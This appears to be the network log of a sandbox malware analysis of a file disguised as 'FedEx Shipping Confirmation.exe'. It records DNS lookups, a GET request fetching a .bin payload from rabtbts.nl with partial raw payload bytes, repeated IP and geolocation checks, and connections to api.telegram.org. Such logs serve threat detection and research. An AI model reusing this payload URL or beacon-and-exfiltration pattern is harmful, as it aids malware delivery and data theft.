Aug 27, 2024 18:04:57.903543949 CEST	49803	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.903743982 CEST	49803	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.903811932 CEST	443	49803	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.946926117 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:58.118065119 CEST	443	49803	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:58.119637012 CEST	49803	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:58.119651079 CEST	443	49803	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:58.376377106 CEST	443	49803	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:58.376995087 CEST	443	49803	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:58.377213001 CEST	49803	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:58.377465010 CEST	49803	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:58.379630089 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:58.567611933 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:58.568294048 CEST	49804	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:58.568391085 CEST	443	49804	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:58.568634987 CEST	49804	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:58.568821907 CEST	49804	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:58.568878889 CEST	443	49804	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:58.618536949 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:58.790941954 CEST	443	49804	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:58.792304039 CEST	49804	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:58.792376041 CEST	443	49804	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.066979885 CEST	443	49804	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.067168951 CEST	443	49804	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.067326069 CEST	49804	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.067663908 CEST	49804	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.069802046 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:59.257766962 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:59.258399963 CEST	49805	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.258424044 CEST	443	49805	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.258757114 CEST	49805	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.258946896 CEST	49805	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.258958101 CEST	443	49805	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.305896044 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:59.483500004 CEST	443	49805	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.484837055 CEST	49805	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.484858990 CEST	443	49805	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.749963999 CEST	443	49805	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.750515938 CEST	443	49805	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:59.750721931 CEST	49805	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.750972033 CEST	49805	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:59.922019958 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:04:59.922142029 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:04:59.922487974 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:04:59.922638893 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:04:59.922691107 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:05:00.307645082 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:05:00.307972908 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:05:00.309863091 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:05:00.309875965 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:05:00.310162067 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:05:00.311443090 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:05:00.352289915 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:05:00.671238899 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:05:00.671480894 CEST	443	49806	149.154.167.220	192.168.11.20
Aug 27, 2024 18:05:00.671607971 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:05:00.674216032 CEST	49806	443	192.168.11.20	149.154.167.220
Aug 27, 2024 18:06:04.258232117 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:06:04.258423090 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:06:39.268759966 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:06:39.455873966 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:06:40.330671072 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:06:40.736696959 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:06:41.549076080 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:06:43.173661947 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:06:46.422946930 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:06:52.921580076 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:07:05.918663025 CEST	49795	80	192.168.11.20	104.153.208.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 27, 2024 18:04:50.344847918 CEST	51713	53	192.168.11.20	1.1.1.1
Aug 27, 2024 18:04:50.451720953 CEST	53	51713	1.1.1.1	192.168.11.20
Aug 27, 2024 18:04:52.157344103 CEST	59032	53	192.168.11.20	1.1.1.1
Aug 27, 2024 18:04:52.259893894 CEST	53	59032	1.1.1.1	192.168.11.20
Aug 27, 2024 18:04:53.389847994 CEST	58384	53	192.168.11.20	1.1.1.1
Aug 27, 2024 18:04:53.494004011 CEST	53	58384	1.1.1.1	192.168.11.20
Aug 27, 2024 18:04:59.819658041 CEST	52221	53	192.168.11.20	1.1.1.1
Aug 27, 2024 18:04:59.921281099 CEST	53	52221	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 27, 2024 18:04:50.344847918 CEST	192.168.11.20	1.1.1.1	0x258f	Standard query (0)	rabtbts.nl	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:52.157344103 CEST	192.168.11.20	1.1.1.1	0x3e50	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:53.389847994 CEST	192.168.11.20	1.1.1.1	0x8cf8	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:59.819658041 CEST	192.168.11.20	1.1.1.1	0x62b5	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 27, 2024 18:04:50.451720953 CEST	1.1.1.1	192.168.11.20	0x258f	No error (0)	rabtbts.nl		104.153.208.178	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:52.259893894 CEST	1.1.1.1	192.168.11.20	0x3e50	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 18:04:52.259893894 CEST	1.1.1.1	192.168.11.20	0x3e50	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:52.259893894 CEST	1.1.1.1	192.168.11.20	0x3e50	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:52.259893894 CEST	1.1.1.1	192.168.11.20	0x3e50	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:52.259893894 CEST	1.1.1.1	192.168.11.20	0x3e50	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:52.259893894 CEST	1.1.1.1	192.168.11.20	0x3e50	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:53.494004011 CEST	1.1.1.1	192.168.11.20	0x8cf8	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:53.494004011 CEST	1.1.1.1	192.168.11.20	0x8cf8	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Aug 27, 2024 18:04:59.921281099 CEST	1.1.1.1	192.168.11.20	0x62b5	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

rabtbts.nl

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49795	104.153.208.178	80	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 18:04:50.620862961 CEST	174	OUT	GET /SaOUJJyWvcSxh69.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: rabtbts.nl Cache-Control: no-cache
Aug 27, 2024 18:04:50.784583092 CEST	1289	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:50 GMT Server: Apache Last-Modified: Tue, 27 Aug 2024 02:52:30 GMT Accept-Ranges: bytes Content-Length: 274496 Content-Type: application/octet-stream Data Raw: 59 57 73 0f 42 b8 95 25 7f 91 17 25 67 aa 16 65 65 ee f1 7d c7 d1 a9 80 1a 0c 96 06 c0 05 45 fd c8 67 e5 25 0c a3 6d 6b a8 66 a9 a9 ed 37 95 3b c3 bb 79 b5 32 1f 5b ae 74 ce 0b ff 0f f7 94 ad 50 86 9f 75 cf 1e 65 23 84 31 57 a6 f2 5e aa 76 d3 47 ef e1 41 d0 4b 3e fd 57 d3 3b 9c bb 96 27 e1 e2 8b 40 69 e9 3e 22 3c 07 16 5b 81 46 92 a7 ec cb e8 23 4c 0b ef 50 9f 1e 76 ee ae 8e f0 f5 b4 bf 82 91 65 97 c5 cf 0b a2 8d c6 43 07 a5 be e9 0c f3 50 8d 3e ab 95 db ff 5e 72 21 7d f2 41 e0 fc a5 ca b0 a9 34 70 5f 69 43 da 30 60 1a b3 2c 21 a8 08 d8 5b 6e c2 66 e1 a1 8a 5e ca 00 35 8b 42 f8 e4 ca 4f 1e db 10 d3 72 21 63 40 67 f0 a5 19 64 75 b8 d3 fc 9d cb 72 39 24 47 fe 9b 72 6b a0 d7 58 8c 0a c5 7a c6 22 c2 79 69 2c 7f b2 8e 00 b3 a3 bd cc 42 6f 1d 0f 00 d2 63 73 cc 7f c5 5e cf 22 2e 9f d2 8d eb 54 91 ae 7e 49 01 47 77 45 e0 e4 bd 31 ba 54 b7 ce b4 91 f3 4e a6 6e ca 70 d3 45 dd 54 b2 ec a7 a7 ad 64 05 2a a7 8c fe 7d ac 31 c7 21 97 02 75 d8 f3 9d bd f4 0f 07 b2 b6 59 67 99 89 7f 58 a4 9e 70 62 08 fa 27 97 95 a2 [TRUNCATED] Data Ascii: YWsB%%gee}Eg%mkf7;y2[tPue#1W^vGAK>W;'@i>"<[F#LPveCP>^r!}A4p_iC0`,![nf^5BOr!c@gdur9$GrkXz"yi,Bocs^".T~IGwE1TNnpETd}1!uYgXpb'R0v'3U${{DC\zrbsJ:6chpef^$]o/D2T7"r?FMvpgezNLJ&^)[^0qgTh,VoKRUN7JCaX0=DyoB&O, IF(JHV9d\|[v^22\cnF[Ft2Gm`9bh]'xc\i\!FpW2##v,Ny5>@Qr~3qy@%@}+$(LsU( mP*C4]!mXaEqu"~zZS)Ns(KNq;1}Z;e?s7_VYs<" sjr3QYY+!s\9l\|H0r{)uF{&Fh@/!aB(\|mW\7.GyMCy+r]h7R7SD@e+aT#'cQ [TRUNCATED]
Aug 27, 2024 18:04:50.784658909 CEST	1289	IN	Data Raw: 3b aa 3c f6 01 39 01 ae 56 3f ce 8d ad 51 0b 6a db 9c 24 1b 51 d8 6e 54 1f 3d 80 e5 d6 8f 2f 0c 59 c7 df c8 68 3b 06 98 4e 18 fa f0 8a d0 0a ec 90 c0 cc f0 90 cd b9 b3 c7 62 23 38 b2 0f 07 b9 2a b5 c2 b0 af 09 52 77 92 79 a0 2f d9 64 0b 1d 1c 12 Data Ascii: ;<9V?Qj$QnT=/Yh;Nb#8*Rwy/dYs[Z/ce4c=nuOJuF60}G5x\L8#wn[lF[\|y:PN/EL6QS6!t3g8+RHX+!!]=$VP(fn'Z
Aug 27, 2024 18:04:50.784719944 CEST	1289	IN	Data Raw: d8 66 12 ec 33 2e f3 d3 54 7e 8c 83 eb 0f 2d e7 c3 05 12 3e c1 53 68 e7 fa bd d0 4e 99 63 b7 70 f5 f5 13 8a c9 5f ab a3 9d af 86 7e 43 ec 3c 21 68 34 90 46 7f e8 c1 bd fb 23 2e 6a e8 cc d0 28 bb 37 f7 28 a1 c2 e8 e7 e6 b2 40 c6 0e aa 34 11 8a b9 Data Ascii: f3.T~->ShNcp_~C<!h4F#.j(7(@4N'#rs=E,y:Ntmax#C W,iLt3Xx"i+=#I/@PSs{.XE+RH8d'\P/L`ZSWo&=1)
Aug 27, 2024 18:04:50.784776926 CEST	1289	IN	Data Raw: 52 dc 79 31 fd 30 c6 b6 ab b6 05 51 72 d2 a6 0e 78 33 01 f6 b3 79 16 02 0f f1 a5 59 1d 74 f7 4a 2b b9 e1 01 39 be 4f 27 15 55 da fa 5b 70 6d 94 5a c3 54 5f 43 07 30 32 97 fc 26 94 8d 65 3c 39 a6 6b 47 b6 7e 22 0b fa 7e 91 d7 a7 ab 75 1e 95 b1 d7 Data Ascii: Ry10Qrx3yYtJ+9O'U[pmZT_C02&e<9kG~"~upI)f1u/yE(O7XE;,v.<.b93PqZ$<,iu`":=*G"BR_E8#Yr\|d-[dnd%
Aug 27, 2024 18:04:50.784832954 CEST	1289	IN	Data Raw: 1e 4d 80 76 47 66 e2 65 eb 14 4e 09 05 4c 4a 84 d4 26 e5 b6 2e 5a 7b 85 f6 ab b7 49 3b 87 71 b0 08 2f fb 67 48 68 2c 56 16 cd 6f 90 c3 4b b9 1f 53 88 55 19 99 36 08 0a 9b 60 9a b8 3a 80 5c 52 62 79 6f 4f 09 16 4c 2c 16 d7 20 49 57 28 4a 3b d8 c7 Data Ascii: MvGfeNLJ&.Z{I;q/gHh,VoKSU6`:\RbyoOL, IW(J;HV2LvXY]V[sS1F~AGBog`I;ej7~hX6}iOo^MFQ4LKQ\|Z_rv"uy%>ss@@!w
Aug 27, 2024 18:04:50.784888983 CEST	1289	IN	Data Raw: 7b cf 10 9d 5e cf 28 41 15 d2 8d e5 47 94 bf 7b 5f 10 43 61 db cc 6f bd 33 b0 54 b0 df b0 fe 7d 4e e6 e1 ca 77 db 2a 50 44 b2 e6 a7 a0 d2 ea 05 3a ad 9f f8 7f 84 be d7 21 9d 11 72 f0 7a 9d bd fe 1e 01 ab 89 4b 76 cd 07 16 37 34 de 74 68 70 9e 27 Data Ascii: {^(AG{_Cao3T}Nw*PD:!rzKv74thp';\|5$zkDjS\kbsAfYuY5qm`/lD2C}PAkp!RDMvpW>YNLJ}",Zq<W {"
Aug 27, 2024 18:04:50.784945011 CEST	1289	IN	Data Raw: e7 c6 63 89 2c 36 46 92 b8 e1 14 2c 6f 2d 1a 8b 56 a3 99 c6 02 18 64 cb 6b 70 23 80 30 7b ab 1c a6 df 63 6b 47 ee 8e 40 d0 4b 34 bd 8b c2 3f 96 65 84 02 c9 d6 8b 40 63 fa 34 22 28 0d 3e 39 81 46 98 79 ec cd c2 22 50 0b ef 52 9f 79 76 df b6 8e e7 Data Ascii: c,6F,o-Vdkp#0{ckG@K4?e@c4"(>9Fy"PRyv8e"&uQo@`;.AnWV-rADj$/B]4F]Ao8c@fPKhsi.adsl2yiso%9pZMSoNnw3U
Aug 27, 2024 18:04:50.784998894 CEST	1289	IN	Data Raw: f0 cc 0e ec d0 69 1c a2 04 cc 2c f7 79 55 14 df 1d 57 5b 2e c1 99 ed 6f 0f e9 fe d1 14 4c b3 25 74 84 c9 6d a1 9f e6 b6 bb d7 9d b3 7c 03 d8 46 58 6e 39 9b e2 ed 97 f7 41 c8 36 62 27 64 72 91 fc df d9 e3 79 d6 16 d8 21 5d 59 56 83 de 80 b7 c7 26 Data Ascii: i,yUW[.oL%tm\|FXn9A6b'dry!]YV&2Gb+n`4p1Kzb_$5sBN4X3'^]>xi'4V>h\4]^$0wz'r!?3oi/K-026\MeSWu
Aug 27, 2024 18:04:50.785053968 CEST	1289	IN	Data Raw: 77 42 d8 5a da 0a f7 a8 5e c1 9f 5f cd 93 e7 c7 71 06 a4 78 0f 0d b3 28 68 af cc 87 3d 56 75 9c 17 e8 2f f1 02 21 4b 16 ce 22 2f 5b cb f0 72 60 dc 15 1e 36 ee 50 63 0b 96 ea fb 96 ab 0c c4 49 ca 62 0c 04 51 f9 6d 14 dd 73 08 cc c2 ef d4 60 53 8b Data Ascii: wBZ^_qx(h=Vu/!K"/[r`6PcIbQms`Sa0;S`svSH46sBcvF'0St+p/EDg)bPpqE'C]e!H;S{nW~%p\-sY[^E)(z
Aug 27, 2024 18:04:50.785106897 CEST	1289	IN	Data Raw: ad 81 12 4c c4 e2 25 7c 16 a3 a6 7f e2 c0 a9 d2 13 59 33 09 cc a0 f2 a0 31 e6 2c 9f f9 9b 05 ec dd 0b d0 18 d3 a5 53 8a b3 91 46 84 a0 fa b5 c6 07 0a 9a c1 04 23 72 73 92 f2 00 89 3d 56 34 d9 79 fd 3c a2 2e 24 82 84 63 01 82 5c 2f fd f8 bf 4a d7 Data Ascii: L%\|Y31,SF#rs=V4y<.$c\/JV$))L@,EiLv<83cl$*hI4+0'bZ<{]@IX8h\/Fy]{j U8 vh;gA)2Ythd(9Rr%
Aug 27, 2024 18:04:50.947619915 CEST	1289	IN	Data Raw: f7 ff eb 00 8e 6d 94 5a 6b 0f 4c 31 79 27 39 e0 72 04 8a a3 a4 6d 39 ac c3 60 2c 07 2c 04 fe 70 38 f2 bc d1 46 19 b9 b2 72 a0 78 f9 94 a6 ff 2a 31 51 ab 29 d4 6c 93 36 6d 9d 96 fc 1a 9d 38 b7 b8 52 43 bc d7 5a 07 2f 52 4b 3d 79 2c 8b 7b 04 c7 01 Data Ascii: mZkL1y'9rm9`,,p8Frx1Q)l6m8RCZ/RK=y,{Yw5 [^Vv<&}qmF[P)R)MxFcE0rO>w\|\|!`Jyr_(Do</94u)79e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49796	193.122.6.168	80	3660	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 18:04:52.451443911 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 27, 2024 18:04:52.640187025 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:52 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b393a8426022e4088b215863534d8698 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:52.659390926 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:52.847749949 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:52 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c620fa81062c9bc18cbca846fefc93fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:54.339828968 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:54.528420925 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:54 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f4c287f808ef024b093037175c7ba814 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:55.012911081 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:55.200591087 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:55 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b235fe77067ddbb08365b944d562fee Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:55.675640106 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:55.864722967 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:55 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bd19b1f827b113aec48f6030a2ab7e8d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:56.343410015 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:56.531816006 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:56 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7d56398caa8c35f93b77a3b732ecbf7f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:57.038362026 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:57.226730108 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:57 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e22d8c53fa3723c33e97ddb22434daf7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:57.714824915 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:57.902642012 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:57 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7c7c682d3ed529e5e1c594fa97837a23 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
Aug 27, 2024 18:04:58.379630089 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 27, 2024 18:04:58.567611933 CEST	322	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 16:04:58 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 203925a957043f21e578a2b46c530a5a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.74</body></html>
